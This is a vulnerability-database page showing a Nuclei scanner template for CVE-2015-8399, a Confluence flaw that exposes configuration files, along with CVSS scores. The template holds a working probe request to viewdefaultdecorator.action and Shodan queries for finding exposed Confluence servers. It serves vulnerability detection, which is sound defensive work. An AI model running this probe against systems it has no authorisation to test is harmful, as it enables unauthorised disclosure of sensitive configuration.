Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-8399
HistoryApr 06, 2021 - 7:37 p.m.

Atlassian Confluence <5.8.17 - Information Disclosure

2021-04-0619:37:06
ProjectDiscovery
github.com
2

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.4 Medium

AI Score

Confidence

High

0.966 High

EPSS

Percentile

99.6%

Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.

id: CVE-2015-8399

info:
  name: Atlassian Confluence <5.8.17 - Information Disclosure
  author: princechaddha
  severity: medium
  description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  remediation: |
    Upgrade to a version higher than 5.8.17 to mitigate the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
    - https://www.exploit-db.com/exploits/39170/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8399
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-8399
    cwe-id: CWE-200
    epss-score: 0.9655
    epss-percentile: 0.99519
    cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: confluence
    shodan-query:
      - http.component:"Atlassian Confluence"
      - cpe:"cpe:2.3:a:atlassian:confluence"
      - http.component:"atlassian confluence"
  tags: cve2015,cve,edb,atlassian,confluence

http:
  - method: GET
    path:
      - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "confluence-init.properties"
          - "View Default Decorator"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402207f50cefa6f24f4fb1f07b3b229fb698234043c337386cfe67f50d6a60d86ca6302200a267245e74b46efeccd471d30ecb8fe04ff0729b0fa3e31158b34c33e71d3ae:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

4.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

4.4 Medium

AI Score

Confidence

High

0.966 High

EPSS

Percentile

99.6%